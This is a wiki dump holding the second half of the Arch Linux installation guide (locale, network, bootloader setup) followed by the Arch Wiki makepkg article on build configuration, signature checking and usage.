{{Warning|Do not assume that the tools you used from the ISO are automatically installed. For example, if you used ''wifi-menu'' to gain network access during the installation and want to continue so after the first boot, you will have to install ''dialog'' to use it. The following section specifies such cases, do follow it closely to avoid a hiccup in your fresh install.}}<br />
<br />
=== Locale ===<br />
<br />
Locales define which language the system uses and other regional considerations, such as currency denomination, numerology and character sets. Possible values are listed in {{ic|/etc/locale.gen}}, with the active locale defined in {{ic|locale.conf}} files.<br />
<br />
All entries in {{ic|locale.gen}} are commented out (preceded by {{ic|#}}) by default. Uncomment {{ic|en_US.UTF-8 UTF-8}}, as well as other needed localisations. {{ic|UTF-8}} is highly recommended over other options.<br />
<br />
{{hc|# nano /etc/locale.gen|<br />
...<br />
#en_SG ISO-8859-1<br />
en_US.UTF-8 UTF-8<br />
#en_US ISO-8859-1<br />
...<br />
}}<br />
<br />
Before locales can be enabled, they must be ''generated'':<br />
<br />
# locale-gen<br />
<br />
Create {{ic|/etc/locale.conf}}, where {{ic|LANG}} refers to the first column of an uncommented entry in {{ic|/etc/locale.gen}}:<br />
<br />
# echo LANG=''en_US.UTF-8'' > /etc/locale.conf<br />
<br />
Export the chosen locale:<br />
<br />
# export LANG=''en_US.UTF-8''<br />
<br />
{{Tip|<br />
* Setting {{ic|en_US.UTF-8}} as the system-wide locale allows to keep system logs in English for easier troubleshooting. Users can override this setting for their environment as described in [[Locale#Setting the locale]].<br />
* {{ic|LANG}} acts as the default value for the locale-related {{ic|LC_*}} variables. To use other locales for these variables, run ''locale'' to see the available options and add them to {{ic|locale.conf}}. It is not recommended to set the {{ic|LC_ALL}} variable. See [[Locale]] for details.<br />
}}<br />
<br />
=== Console font and keymap ===<br />
<br />
If you changed the default console keymap and font in [[#Keyboard layout]], you will have to edit {{ic|/etc/vconsole.conf}} ''accordingly'' (create it if it does not exist) to make those changes persist in the installed system, for example:<br />
<br />
{{hc|# nano /etc/vconsole.conf|2=<br />
KEYMAP=de-latin1<br />
FONT=lat9w-16<br />
}}<br />
<br />
{{Warning|If you set {{ic|KEYMAP}} to a different value than the one you initially set with ''loadkeys'', and then you [[#Set the root password]], you may have problems logging into the new system after rebooting, because some keys may be mapped differently between the two layouts.}}<br />
<br />
Note that these settings are only valid for your virtual consoles, not in [[Xorg]]. See [[Fonts#Console fonts]] for more information.<br />
<br />
=== Time zone ===<br />
<br />
Available time zones and subzones can be found in the {{ic|/usr/share/zoneinfo/''Zone''/''SubZone''}} directories, and listed with the ''ls'' command. Create a symbolic link {{ic|/etc/localtime}} to your subzone file {{ic|/usr/share/zoneinfo/''Zone''/''SubZone''}}:<br />
<br />
# ln -s /usr/share/zoneinfo/''Zone''/''SubZone'' /etc/localtime<br />
<br />
You may use [http://tldp.org/LDP/abs/html/tabexpansion.html tab completion] to show available zones and subzones. Example:<br />
<br />
# ln -s /usr/share/zoneinfo/Europe/Minsk /etc/localtime<br />
<br />
If you get {{ic|ln: failed to create symbolic link '/etc/localtime': File exists}}, check the existing file with {{ic|ls -l /etc/localtime}} and add the {{ic|-f}} option to the ''ln'' command to overwrite it.<br />
<br />
=== Hardware clock ===<br />
<br />
If you have multiple operating systems installed in the same machine, they will all derive the current time from the same hardware clock, which must be set to either UTC or ''localtime''. For this reason you must make sure that all the operating systems see the hardware clock as providing time in the same chosen [[Time#Time standard|standard]], otherwise some of them will perform the time zone adjustement for the system clock, while others will not.<br />
<br />
In particular, it is strongly recommended to set the hardware clock to UTC, in order to avoid conflicts between the installed operating systems. For example, if the hardware clock was set to ''localtime'', more than one operating system may adjust it after a [[Wikipedia:Daylight_saving_time|DST]] change, thus resulting in an overcorrection; more problems may arise when travelling between different time zones and using one of the operating systems to reset the system/hardware clock.<br />
<br />
To set the hardware clock to UTC in Linux, run:<br />
<br />
# hwclock --systohc --utc<br />
<br />
The ''hwclock'' command also generates the {{ic|/etc/adjtime}} file.<br />
<br />
{{Note|Using UTC for the hardware clock does not mean that software will display time in UTC. However, the system setup/BIOS interface will instead: this should be neither surprising nor treated as a bug.}}<br />
<br />
{{Warning|Windows systems use ''localtime'' by default. Using ''localtime'' on Arch systems may lead to several known and unfixable bugs, but there are no plans to drop support for ''localtime''. It is, though, recommended to set Windows to use UTC instead, and prevent it from synchronising time. See [[Time#UTC in Windows]].}}<br />
<br />
=== Kernel modules ===<br />
<br />
Needed kernel modules are automatically loaded by ''udev'', so you will rarely need to load modules manually. See [[Kernel modules]] for details.<br />
<br />
=== Hostname ===<br />
<br />
Set the [[Network_configuration#Set_the_hostname|hostname]] to your liking:<br />
<br />
# echo ''myhostname'' > /etc/hostname<br />
<br />
Add the same hostname to {{ic|/etc/hosts}}:<br />
<br />
#<ip-address> <hostname.domain.org> <hostname><br />
127.0.0.1 localhost.localdomain localhost ''myhostname''<br />
::1 localhost.localdomain localhost ''myhostname''<br />
<br />
=== Configure the network ===<br />
<br />
You need to configure the network again, but this time for your newly installed environment. The procedure and prerequisites are very similar to the one described [[#Establish an internet connection|above]], except we are going to make it persistent and automatically run at boot.<br />
<br />
As a first step, identify the network interface name you want to configure the connection for with {{ic|ip link}}.<br />
<br />
{{Note|<br />
* For more in-depth information on network configuration, visit [[Network configuration]] and [[Wireless network configuration]].<br />
* If you would like to use the old interface naming scheme (i.e. {{ic|eth''X''}} and {{ic|wlan''X''}}) you can accomplish this by creating an empty file at {{ic|/etc/udev/rules.d/80-net-setup-link.rules}} which will mask the file of the same name located under {{ic|/usr/lib/udev/rules.d}}.<br />
}}<br />
<br />
==== Wired ====<br />
<br />
===== Dynamic IP =====<br />
<br />
; Using dhcpcd<br />
<br />
If you only use a single fixed wired network connection, you do not need a network management service and can simply enable the ''dhcpcd'' service for the interface:<br />
<br />
# systemctl enable dhcpcd@''interface_name''.service<br />
<br />
; Using netctl<br />
<br />
Copy a sample profile from {{ic|/etc/netctl/examples}} to {{ic|/etc/netctl}}:<br />
<br />
# cd /etc/netctl<br />
# cp examples/ethernet-dhcp my_network<br />
<br />
Edit the profile as needed (update {{ic|Interface}} from {{ic|eth0}} to the interface name of the system.<br />
# nano my_network<br />
<br />
Enable the {{ic|my_network}} profile:<br />
<br />
# netctl enable my_network<br />
<br />
{{Note|You will get the message "Running in chroot, ignoring request.". This can be ignored for now.}}<br />
<br />
; Using netctl-ifplugd<br />
<br />
{{Warning|You cannot use this method in conjunction with explicitly enabling profiles, such as {{ic|netctl enable ''profile''}}.}}<br />
<br />
Alternatively, you can use {{ic|netctl-ifplugd}}, which gracefully handles dynamic connections to new networks.<br />
<br />
Install {{Pkg|ifplugd}}, which is required for {{ic|netctl-ifplugd}}:<br />
<br />
# pacman -S ifplugd<br />
<br />
Then enable for interface that you want:<br />
<br />
# systemctl enable netctl-ifplugd@''interface''.service<br />
<br />
{{Tip|[[netctl]] also provides {{ic|netctl-auto}}, which can be used to handle wireless profiles in conjunction with {{ic|netctl-ifplugd}}.}}<br />
<br />
===== Static IP =====<br />
<br />
; Using netctl<br />
<br />
Copy a sample profile from {{ic|/etc/netctl/examples}} to {{ic|/etc/netctl}}:<br />
<br />
# cd /etc/netctl<br />
# cp examples/ethernet-static my_network<br />
<br />
Edit the profile as needed (modify {{ic|Interface}}, {{ic|Address}}, {{ic|Gateway}} and {{ic|DNS}}):<br />
<br />
# nano my_network<br />
<br />
For the {{ic|Address}} take care to include the correct netmask (the {{ic|/24}} in the sample profile equates to a netmask of {{ic|255.255.255.0}}) or the profile will fail to start. See also [[wikipedia:Classless Inter-Domain Routing#CIDR notation|CIDR notation]].<br />
<br />
Enable above created profile to start it at every boot:<br />
<br />
# netctl enable my_network<br />
<br />
; Using systemd-networkd<br />
<br />
See [[systemd-networkd]].<br />
<br />
==== Wireless ====<br />
<br />
{{Note|If your wireless adapter requires a firmware (as described in the above [[#Wireless|Establish an internet connection]] section and also in the article [[Wireless network configuration#Device driver]]), install the package containing your firmware. Most of the time, the {{Pkg|linux-firmware}} package will contain the needed firmware. Though for some devices, the required firmware might be in its own package. For example:<br />
{{bc|# pacman -S zd1211-firmware}}<br />
See [[Wireless network configuration#Installing driver/firmware]] for more info.}}<br />
<br />
Install {{Pkg|iw}} and {{Pkg|wpa_supplicant}} which you will need to connect to a network:<br />
<br />
# pacman -S iw wpa_supplicant<br />
<br />
===== Adding wireless networks =====<br />
<br />
; Using wifi-menu<br />
<br />
Install {{Pkg|dialog}}, which is required for ''wifi-menu'':<br />
<br />
# pacman -S dialog<br />
<br />
After finishing the rest of this installation and rebooting, you can connect to the network with {{ic|wifi-menu ''interface_name''}} (where {{ic|''interface_name''}} is the interface of your wireless chipset).<br />
<br />
# wifi-menu ''interface_name''<br />
<br />
{{Warning|Do not use ''wifi-menu'' now, instead wait until you have finished this guide and have rebooted. It will not work now because a process spawned by this command will conflict with the one you have running outside of the chroot. Alternatively, you could just configure a network profile manually using the following templates so that you do not have to worry about using ''wifi-menu'' at all.}}<br />
<br />
; Using manual netctl profiles<br />
<br />
Copy a network profile from {{ic|/etc/netctl/examples}} to {{ic|/etc/netctl}}:<br />
<br />
# cd /etc/netctl<br />
# cp examples/wireless-wpa my-network<br />
<br />
Edit the profile as needed (modify {{ic|Interface}}, {{ic|ESSID}} and {{ic|Key}}):<br />
<br />
# nano my-network<br />
<br />
Enable above created profile to start it at every boot:<br />
<br />
# netctl enable my-network<br />
<br />
===== Connect automatically to known networks =====<br />
<br />
{{Warning|This method cannot be used with explicitely enabled [[Netctl#Configuration|profiles]], i.e. through {{ic|netctl enable ''profile''}}.}}<br />
<br />
Install {{Pkg|wpa_actiond}}, which is required for {{ic|netctl-auto}}:<br />
<br />
# pacman -S wpa_actiond<br />
<br />
Enable the {{ic|netctl-auto}} service, which will connect to known networks and gracefully handle roaming and disconnects:<br />
<br />
# systemctl enable netctl-auto@''interface_name''.service<br />
<br />
{{Tip|[[netctl]] also provides {{ic|netctl-ifplugd}}, which can be used to handle wired profiles in conjunction with {{ic|netctl-auto}}.}}<br />
<br />
==== Analog modem, ISDN or PPPoE DSL ====<br />
<br />
For xDSL, dial-up and ISDN connections, see [[Direct Modem Connection]].<br />
<br />
=== Create an initial ramdisk environment ===<br />
<br />
{{Tip|Most users can skip this step and use the defaults provided in {{ic|mkinitcpio.conf}}. The initramfs image (from the {{ic|/boot}} folder) has already been generated based on this file when the {{Pkg|linux}} package (the Linux kernel) was installed earlier with ''pacstrap''.}}<br />
<br />
Here you need to set the right [[Mkinitcpio#HOOKS|hooks]] if the root is on a USB drive, if you use RAID, LVM, if using a multi-device Btrfs volumes as root, or if {{ic|/usr}} is on a separate partition.<br />
<br />
Edit {{ic|/etc/mkinitcpio.conf}} as needed and re-generate the initramfs image with:<br />
<br />
# mkinitcpio -p linux<br />
<br />
=== Set the root password ===<br />
<br />
Set the root password with:<br />
<br />
# passwd<br />
<br />
=== Install and configure a bootloader ===<br />
<br />
==== For BIOS motherboards ====<br />
<br />
For BIOS systems, several boot loaders are available, see [[Boot loaders]] for a complete list. Choose one as per your convenience. Possible choices include:<br />
<br />
* [[Syslinux#Installation]] is (currently) limited to loading only files from the partition where it was installed. Its configuration file is considered to be easier to understand. An example configuration can be found in [[Syslinux#Examples]].<br />
* [[GRUB]] is more feature-rich and supports more complex scenarios. Its configuration file(s) is more similar to 'sh' scripting language, which may be difficult for beginners to manually write. It is recommended that they automatically generate one.<br />
<br />
Here, installation with '''GRUB''' and '''MBR''' is demonstrated. Install the {{Pkg|grub}} package and then run ''grub-install'' to install the bootloader:<br />
<br />
# pacman -S grub<br />
# grub-install --target=i386-pc --recheck '''/dev/sda'''<br />
<br />
{{Note|<br />
* Change {{ic|/dev/sda}} to reflect the drive you installed Arch on. Do not append a partition number (do not use {{ic|sda''X''}}).<br />
* A sample {{ic|/boot/grub/grub.cfg}} gets installed as part of the {{Pkg|grub}} package, and subsequent {{ic|grub-*}} commands may not over-write it. Ensure that your intended changes are in {{ic|grub.cfg}}, rather than in {{ic|grub.cfg.new}} or some such file.<br />
}}<br />
<br />
Automatically generate {{ic|grub.cfg}}:<br />
<br />
{{Tip|To automatically search for other operating systems on your computer, install {{Pkg|os-prober}} ({{ic|pacman -S os-prober}}) before running the next command.}}<br />
<br />
# grub-mkconfig -o /boot/grub/grub.cfg<br />
<br />
For more information on configuring and using GRUB, see [[GRUB]].<br />
<br />
==== For UEFI motherboards ====<br />
<br />
For UEFI systems, several boot loaders are available, see [[Boot loaders]] for a complete list. Choose one as per your convenience. Possible choices include:<br />
<br />
* [[gummiboot]] is a minimal UEFI Boot Manager which provides a menu for [[EFISTUB]] kernels and other UEFI applications. This is recommended for beginners, especially those wishing to dual-boot with other installed operating systems such as Windows 8.<br />
* [[GRUB#UEFI_systems|GRUB]] is a more complete bootloader, useful if you run into problems with Gummiboot.<br />
<br />
Here, installation with ''gummiboot'' is demonstrated. First install {{Pkg|dosfstools}} to manipulate the EFI System Partition post-installation, and {{Pkg|efibootmgr}} to create a UEFI boot entry (used by bootmanager installation scripts):<br />
<br />
# pacman -S dosfstools efibootmgr<br />
<br />
{{Note|<br />
* For UEFI boot, the drive needs to be GPT-partitioned and an [[Unified Extensible Firmware Interface#EFI System Partition|EFI System Partition]] (512 MiB or larger, gdisk type {{ic|EF00}}, formatted with FAT32) must be present. In the following examples, this partition is assumed to be mounted at {{ic|/boot}}. If you have followed this guide from the beginning, you have already done all of these.<br />
* It is strongly recommended to have the EFI System Partition mounted at {{ic|/boot}} as this is required to automatically update Gummiboot.<br />
}}<br />
<br />
Install the {{Pkg|gummiboot}} package and run the automated installation script, replacing {{ic|'''$esp'''}} with the location of your EFI System Partiton, usually {{ic|/boot}}:<br />
<br />
# pacman -S gummiboot<br />
# gummiboot --path='''$esp''' install<br />
<br />
Gummiboot will automatically be detected by firmware that requires that the bootable {{ic|bootx64.efi}} stub be placed in {{ic|'''$esp'''/EFI/boot}}, and will in turn automatically detect the presence of any other installed operating systems using ''.efi'' stubs. However, it will still be necessary to manually create a configuration file for Gummiboot.<br />
<br />
First, create {{ic|'''$esp'''/loader/entries/arch.conf}} and add the following, replacing {{ic|/dev/sdaX}} with your '''root''' partition (e.g. {{ic|/dev/sda1}}):<br />
<br />
{{hc|# nano '''$esp'''/loader/entries/arch.conf|2=<br />
title Arch Linux<br />
linux /vmlinuz-linux<br />
initrd /initramfs-linux.img<br />
options root='''/dev/sdaX''' rw<br />
}}<br />
<br />
Second, create {{ic|'''$esp'''/loader/loader.conf}} and add the following, replacing the timeout value (in seconds) with your own choice:<br />
{{hc|# nano '''$esp'''/loader/loader.conf|2=<br />
default arch<br />
timeout 5<br />
}}<br />
<br />
See [[gummiboot]] for more information.<br />
<br />
== Unmount the partitions and reboot ==<br />
<br />
Exit from the chroot environment:<br />
<br />
# exit<br />
<br />
{{Note|While partitions are unmounted automatically by ''systemd'' on shutdown, you may do so manually with {{ic|umount -R /mnt}} as a safety measure. If the partition is "busy", you can find the cause with [[Wikipedia:fuser_(Unix)|fuser]].}}<br />
<br />
Reboot the computer:<br />
<br />
# reboot<br />
<br />
Remove the installation media, or you may boot back into it. You can log into your new installation as ''root'', using the password you specified with ''passwd''.<br />
<br />
== Post-installation ==<br />
<br />
Your new Arch Linux base system is now a functional GNU/Linux environment ready to be built into whatever you wish or require for your purposes. You are now ''strongly'' advised to read the [[General recommendations]] article, especially the first two sections. Its other sections provide links to post-installation tutorials like setting up a graphical user interface, sound or a touchpad.<br />
<br />
For a list of applications that may be of interest, see [[List of applications]].</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Makepkg&diff=362702Makepkg2015-02-26T01:29:29Z<p>Jakkin: Changed "least" to "lesser" for a more coherent reading experience</p>
<hr />
<div>{{Lowercase title}}<br />
[[Category:Package development]]<br />
[[Category:About Arch]]<br />
[[ar:Makepkg]]<br />
[[el:Makepkg]]<br />
[[es:Makepkg]]<br />
[[fr:makepkg]]<br />
[[it:Makepkg]]<br />
[[ja:Makepkg]]<br />
[[nl:Makepkg]]<br />
[[pt:Makepkg]]<br />
[[ru:makepkg]]<br />
[[sr:Makepkg]]<br />
[[tr:Makepkg]]<br />
[[zh-CN:Makepkg]]<br />
{{Related articles start}}<br />
{{Related|Creating packages}}<br />
{{Related|PKGBUILD}}<br />
{{Related|Arch User Repository}}<br />
{{Related|pacman}}<br />
{{Related|Official repositories}}<br />
{{Related|Arch Build System}}<br />
{{Related articles end}}<br />
<br />
''makepkg'' is used for compiling and building packages suitable for installation with [[pacman]], Arch Linux's package manager. ''makepkg'' is a script that automates the building of packages; it can download and validate source files, check dependencies, configure build-time settings, compile the sources, install into a temporary root, make customizations, generate meta-info, and package everything together.<br />
<br />
''makepkg'' is provided by the {{Pkg|pacman}} package.<br />
<br />
== Configuration ==<br />
{{ic|/etc/makepkg.conf}} is the main configuration file for ''makepkg''. Most users will wish to fine-tune ''makepkg'' configuration options prior to building any packages. You also might create a {{ic|~/.makepkg.conf}} file.<br />
<br />
=== Architecture, compile flags ===<br />
The {{ic|MAKEFLAGS}}, {{ic|CFLAGS}},{{ic|CXXFLAGS}} and {{ic|CPPFLAGS}} options are used by {{Pkg|make}}, {{Pkg|gcc}}, and ''g++'' whilst compiling software with ''makepkg''. By default, these options generate generic packages that can be installed on a wide range of machines. A performance improvement can be achieved by tuning compilation for the host machine. The downside is that packages compiled specifically for the compiling host's processor may not run on other machines.<br />
<br />
{{Note|Do keep in mind that not all package build systems will use your exported variables. Some override them in the original Makefiles or the [[PKGBUILD]]. For example, cmake disregards the preprocessor options environment variable, {{ic|CPPFLAGS}}.}}<br />
<br />
{{hc|/etc/makepkg.conf|<nowiki><br />
[...]<br />
<br />
#########################################################################<br />
# ARCHITECTURE, COMPILE FLAGS<br />
#########################################################################<br />
#<br />
CARCH="x86_64"<br />
CHOST="x86_64-unknown-linux-gnu"<br />
<br />
#-- Exclusive: will only run on x86_64<br />
# -march (or -mcpu) builds exclusively for an architecture<br />
# -mtune optimizes for an architecture, but builds for whole processor family<br />
CPPFLAGS="-D_FORTIFY_SOURCE=2"<br />
CFLAGS="-march=x86-64 -mtune=generic -O2 -pipe -fstack-protector --param=ssp-buffer-size=4"<br />
CXXFLAGS="-march=x86-64 -mtune=generic -O2 -pipe -fstack-protector --param=ssp-buffer-size=4"<br />
LDFLAGS="-Wl,-O1,--sort-common,--as-needed,-z,relro"<br />
#-- Make Flags: change this for DistCC/SMP systems<br />
#MAKEFLAGS="-j2"<br />
<br />
[...]<br />
</nowiki>}}<br />
<br />
The default {{ic|makepkg.conf}} {{ic|CFLAGS}} and {{ic|CXXFLAGS}} are compatible with all machines within their respective architectures. <br />
<br />
On x86_64 machines, there are rarely significant enough real world performance gains that would warrant investing the time to rebuild official packages.<br />
<br />
As of version 4.3.0, GCC offers the {{ic|1=-march=native}} switch that enables CPU auto-detection and automatically selects optimizations supported by the local machine at GCC runtime. To use it, just modify the default settings by changing the {{ic|CFLAGS}} and {{ic|CXXFLAGS}} lines as follows:<br />
<br />
# -march=native also sets the correct -mtune=<br />
CFLAGS="-march=native -O2 -pipe -fstack-protector --param=ssp-buffer-size=4 -D_FORTIFY_SOURCE=2"<br />
CXXFLAGS="${CFLAGS}"<br />
<br />
{{Tip|To see what {{ic|1=march=native}} flags are, run:<br />
<nowiki>$ gcc -march=native -E -v - </dev/null 2>&1 | sed -n 's/.* -v - //p'</nowiki><br />
}}<br />
<br />
Further optimizing for CPU type can theoretically enhance performance because {{ic|1=-march=native}} enables all available instruction sets and improves scheduling for a particular CPU. This is especially noticeable when rebuilding applications (for example: audio/video encoding tools, scientific applications, math-heavy programs, etc.) that can take heavy advantage of newer instructions sets not enabled when using the default options (or packages) provided by Arch Linux. <br />
<br />
It is very easy to reduce performance by using "non-standard" CFLAGS because compilers tend to heavily blow up the code size with loop unrolling, bad vectorization, crazy inlining, etc. depending on compiler switches. Unless you can verify/benchmark that something is faster, there is a very good chance it is not! <br />
<br />
See the GCC man page for a complete list of available options. The Gentoo [http://www.gentoo.org/doc/en/gcc-optimization.xml Compilation Optimization Guide] and [http://wiki.gentoo.org/wiki/Safe_CFLAGS Safe CFLAGS] wiki article provide more in-depth information.<br />
<br />
====MAKEFLAGS====<br />
The {{ic|MAKEFLAGS}} option can be used to specify additional options for make. Users with multi-core/multi-processor systems can specify the number of jobs to run simultaneously. This can be accomplished with the use of ''nproc'' to determine the number of available processors, e.g. {{ic|-j4}} (where "4" is the output of ''nproc''). Some [[PKGBUILD]]s specifically override this with {{ic|-j1}}, because of race conditions in certain versions or simply because it is not supported in the first place. Packages that fail to build because of this should be [[Reporting Bug Guidelines|reported]] on the bug tracker (or in the case of [[AUR]] packages, to the package maintainer) after making sure that the error is indeed being caused by your {{ic|MAKEFLAGS}}.<br />
<br />
See {{ic|man make}} for a complete list of available options.<br />
<br />
=== Package output ===<br />
Next, one can configure where source files and packages should be placed and identify themselves as the packager. This step is optional; packages will be created in the working directory where ''makepkg'' is run by default.<br />
<br />
{{hc|/etc/makepkg.conf|<nowiki><br />
[...]<br />
<br />
#########################################################################<br />
# PACKAGE OUTPUT<br />
#########################################################################<br />
#<br />
# Default: put built package and cached source in build directory<br />
#<br />
#-- Destination: specify a fixed directory where all packages will be placed<br />
#PKGDEST=/home/packages<br />
#-- Source cache: specify a fixed directory where source files will be cached<br />
#SRCDEST=/home/sources<br />
#-- Source packages: specify a fixed directory where all src packages will be placed<br />
#SRCPKGDEST=/home/srcpackages<br />
#-- Packager: name/email of the person or organization building packages<br />
#PACKAGER="John Doe <john@doe.com>"<br />
<br />
[...]<br />
</nowiki>}}<br />
<br />
For example, create the directory:<br />
<br />
$ mkdir /home/$USER/packages<br />
<br />
Then modify the {{ic|PKGDEST}} variable in {{ic|/etc/makepkg.conf}} accordingly.<br />
<br />
The {{ic|PACKAGER}} variable will set the {{ic|packager}} value within compiled packages' {{ic|.PKGINFO}} metadata file. By default, user-compiled packages will display:<br />
<br />
{{hc|$ pacman -Qi ''package''|<nowiki><br />
[...]<br />
Packager : Unknown Packager<br />
[...]<br />
</nowiki>}}<br />
<br />
Afterwards:<br />
<br />
{{hc|$ pacman -Qi ''package''|<nowiki><br />
[...]<br />
Packager : John Doe <john@doe.com><br />
[...]<br />
</nowiki>}}<br />
<br />
This is useful if multiple users will be compiling packages on a system, or you are otherwise distributing your packages to other users.<br />
<br />
=== Signature checking ===<br />
<br />
{{Expansion|Expand a bit on {{ic|validpgpkeys()}}, e.g: "''I then check the person who signed is expected from the software mailing list, check if they sign emails, look if the PGP fingerprint is published on their homepage, … That verifies the signature enough to add the validpgpkeys array for me.''"}}<br />
<br />
If a signature file in the form of {{ic|.sig}} is part of the [[PKGBUILD]] source array, ''makepkg'' validates the authenticity of source files. For example, the signature {{ic|''pkgname''-''pkgver''.tar.gz.sig}} is used to check the integrity of the file {{ic|''pkgname''-''pkgver''.tar.gz}} with the ''gpg'' program.<br />
<br />
If desired, signatures by other developers can be manually added to the GPG keyring. See [[GnuPG]] article for details. To temporarily disable signature checking, call the ''makepkg'' command with the {{ic|--skippgpcheck}} option.<br />
<br />
{{Note|The signature checking implemented in ''makepkg'' does not use pacman's keyring, relying on the user's keyring and the {{ic|validpgpkeys()}} array instead. [http://allanmcrae.com/2015/01/two-pgp-keyrings-for-package-management-in-arch-linux/]}}<br />
<br />
To show the current list of GPG keys, use the ''gpg'' command:<br />
<br />
$ gpg --list-keys<br />
<br />
If the {{ic|pubring.gpg}} file does not exist, it will be created for you immediately.<br />
<br />
The GPG keys are expected to be stored in the user's {{ic|~/.gnupg/pubring.gpg}} file. In case it does not contain the given signature, ''makepkg'' will abort the installation:<br />
<br />
{{hc|$ makepkg|2=<br />
[...]<br />
==> Verifying source file signatures with gpg...<br />
pkgname-pkgver.tar.gz ... FAILED (unknown public key ''1234567890'')<br />
==> ERROR: One or more PGP signatures could not be verified!<br />
}}<br />
<br />
To import the key, use:<br />
<br />
$ gpg --recv-keys ''1234567890''<br />
<br />
Or to automate:<br />
<br />
{{hc|~/.gnupg/gpg.conf|<br />
keyserver-options auto-key-retrieve<br />
}}<br />
<br />
== Usage ==<br />
<br />
Before continuing, ensure the {{Grp|base-devel}} group is installed. Packages belonging to this group are not required to be listed as build-time (make) dependencies in [[PKGBUILD]] files. Install the {{ic|base-devel}} group by issuing (as root):<br />
<br />
# pacman -S base-devel<br />
<br />
{{Note|Before complaining about missing (make) dependencies, remember that the {{Grp|base}} group is assumed to be installed on all Arch Linux systems. The group "base-devel" is assumed to be installed when building with ''makepkg'' or when using [[AUR helpers]].}}<br />
<br />
To build a package, one must first create a [[PKGBUILD]], or build script, as described in [[Creating packages]], or obtain one from the [[Arch Build System|ABS tree]], [[Arch User Repository]], or some other source. <br />
<br />
{{Warning|Only build and/or install packages from trusted sources.}}<br />
<br />
Once in possession of a {{ic|PKGBUILD}}, change to the directory where it is saved and issue the following command to build the package described by said {{ic|PKGBUILD}}:<br />
<br />
$ makepkg<br />
<br />
''makepkg'' does not support building as root as of v4.2. Besides how a {{ic|PKGBUILD}} may contain arbitrary commands, building as root is generally considered unsafe (see for example [https://bbs.archlinux.org/viewtopic.php?id=67561]).<br />
<br />
To have ''makepkg'' clean out leftover files and folders, such as files extracted to the $srcdir, add the following option. This is useful for multiple builds of the same package or updating the package version, while using the same build folder. It prevents obsolete and remnant files from carrying over to the new builds.<br />
<br />
$ makepkg -c<br />
<br />
If required dependencies are missing, ''makepkg'' will issue a warning before failing. To build the package and install needed dependencies automatically, simply use the command:<br />
<br />
$ makepkg -s<br />
<br />
Note that these dependencies must be available in the configured repositories; see [[pacman#Repositories]] for details. Alternatively, one can manually install dependencies prior to building ({{ic|pacman -S --asdeps dep1 dep2}}).<br />
<br />
Once all dependencies are satisfied and the package builds successfully, a package file ({{ic|''pkgname''-''pkgver''.pkg.tar.xz}}) will be created in the working directory. To install, run (as root):<br />
<br />
# pacman -U ''pkgname''-''pkgver''.pkg.tar.xz<br />
<br />
Alternatively, to install, using the {{ic|-i}} flag is an easier way of running {{ic|pacman -U ''pkgname''-''pkgver''.pkg.tar.xz}}, as in:<br />
<br />
$ makepkg -i<br />
<br />
== Tips and Tricks ==<br />
=== Improving compile times ===<br />
<br />
==== tmpfs ====<br />
<br />
Compiling requires handling of many small files and involves many I/O operations; therefore moving its working directory to a [[tmpfs]] may bring significant improvements in build times. <br />
<br />
The {{ic|BUILDDIR}} value may be exported within a shell to temporarily set ''makepkg'' build directory to an existing tmpfs:<br />
$ BUILDDIR=/tmp/makepkg makepkg<br />
<br />
Relevant option in {{ic|/etc/makepkg.conf}} is to be found at the end of the {{ic|BUILD ENVIRONMENT}} section:<br />
{{hc|/etc/makepkg.conf|<nowiki><br />
[...]<br />
<br />
#########################################################################<br />
# BUILD ENVIRONMENT<br />
#########################################################################<br />
#<br />
# Defaults: BUILDENV=(!distcc color !ccache check !sign)<br />
# A negated environment option will do the opposite of the comments below.<br />
#<br />
#-- distcc: Use the Distributed C/C++/ObjC compiler<br />
#-- color: Colorize output messages<br />
#-- ccache: Use ccache to cache compilation<br />
#-- check: Run the check() function if present in the PKGBUILD<br />
#-- sign: Generate PGP signature file<br />
#<br />
BUILDENV=(!distcc color !ccache check !sign)<br />
#<br />
#-- If using DistCC, your MAKEFLAGS will also need modification. In addition,<br />
#-- specify a space-delimited list of hosts running in the DistCC cluster.<br />
#DISTCC_HOSTS=""<br />
#<br />
#-- Specify a directory for package building.<br />
#BUILDDIR=/tmp/makepkg<br />
<br />
[...]<br />
</nowiki>}}<br />
<br />
Uncommenting the {{ic|1=BUILDDIR=/tmp/makepkg}} line and setting it to e.g. {{ic|1=BUILDDIR=/tmp/builds}} (or leaving it to its default value) will make use of Arch default {{ic|/tmp}} [[tmpfs]].<br />
{{Note|The [[tmpfs]] folder needs to be mounted without the {{ic|noexec}} option, else it will prevent build scripts or utilities from being executed. Also, as stated in [[fstab#tmpfs]], its default size is half of the available RAM so you may run out of space.}}<br />
Please be reminded that any package compiled in [[tmpfs]] will not persist across reboot. Therefore, such packages should be installed consecutively to building or be moved to another (persistent) directory.<br />
<br />
==== ccache ====<br />
<br />
The use of [[ccache]] can improve build times by caching the results of compilations.<br />
<br />
=== Generate new checksums ===<br />
Since [http://allanmcrae.com/2013/04/pacman-4-1-released/ pacman 4.1], {{ic|makepkg -g >> PKGBUILD}} is no longer required because pacman-contrib was [https://projects.archlinux.org/pacman.git/tree/NEWS merged into upstream pacman], including the {{ic|updpkgsums}} script that will generate new checksums and/or replace them in the PKGBUILD. In the same directory as the PKGBUILD file, run the following command:<br />
$ updpkgsums<br />
<br />
=== Makepkg source PKGBUILD twice ===<br />
Makepkg sources the PKGBUILD twice (once when initially run, and the second time under ''fakeroot''). Any non-standard functions placed in the PKGBUILD will be run twice as well.<br />
<br />
=== WARNING: Package contains reference to $srcdir ===<br />
Somehow, the literal strings {{ic|$srcdir}} or {{ic|$pkgdir}} ended up in one of the installed files in your package.<br />
<br />
To identify which files, run the following from the ''makepkg'' build directory:<br />
$ grep -R "$(pwd)/src" pkg/<br />
<br />
[http://www.mail-archive.com/arch-general@archlinux.org/msg15561.html Link] to discussion thread.<br />
<br />
=== Create uncompressed packages ===<br />
If you only want to install packages locally, you can speed up the process by avoiding the [[Wikipedia:xz|LZMA2]] compression and subsequent decompression:<br />
<br />
{{hc|/etc/makepkg.conf|2=<br />
[...]<br />
#PKGEXT='.pkg.tar.xz'<br />
PKGEXT='.pkg.tar'<br />
[...]<br />
}}<br />
<br />
=== Utilizing multiple cores on compression ===<br />
{{pkg|xz}} supports [[Wikipedia:Symmetric multiprocessing|symmetric multiprocessing (SMP)]] on compression. This can be done by using the {{ic|-T 0}} ({{ic|1=--threads=0}}) flag, which makes ''xz'' use as many threads as there are cores on the system:<br />
<br />
{{hc|/etc/makepkg.conf|2=<br />
[...]<br />
COMPRESSXZ=(xz -T 0 -c -z -)<br />
[...]<br />
